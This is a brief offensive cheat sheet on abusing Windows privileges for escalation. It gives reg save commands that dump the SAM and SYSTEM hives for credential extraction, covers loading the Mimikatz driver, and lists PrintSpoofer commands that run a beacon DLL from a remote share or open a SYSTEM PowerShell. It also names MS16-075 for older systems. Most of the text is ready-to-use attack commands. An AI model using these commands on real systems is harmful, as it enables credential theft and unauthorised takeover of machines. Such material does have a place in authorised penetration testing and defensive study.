Privilege Abuse

SeBackupPrivilege

reg save HKLM\SYSTEM c:\temp\system.hive
reg save HKLM\SAM c:\temp\sam.hive

SeLoadDriverPrivilege

You can load the mimidrv using !+ in Mimikatz. Remember to clean after yourself !-.

SeImpersonatePrivilege

Windows 10 - Server 2016 / 2019

• https://github.com/itm4n/PrintSpoofer

PrintSpoofer64.exe -c "rundll32 \\<hostname>\<share>\<beacon.dll,Start>"

PrintSpoofer64.exe -i -c powershell (interactive shell)

Older systems

info

You can use the MS16-075 vulnerability.

Ressources

• https://github.com/decoder-it/whoami-priv/raw/master/whoamipriv.pdf
• https://github.com/gtworek/Priv2Admin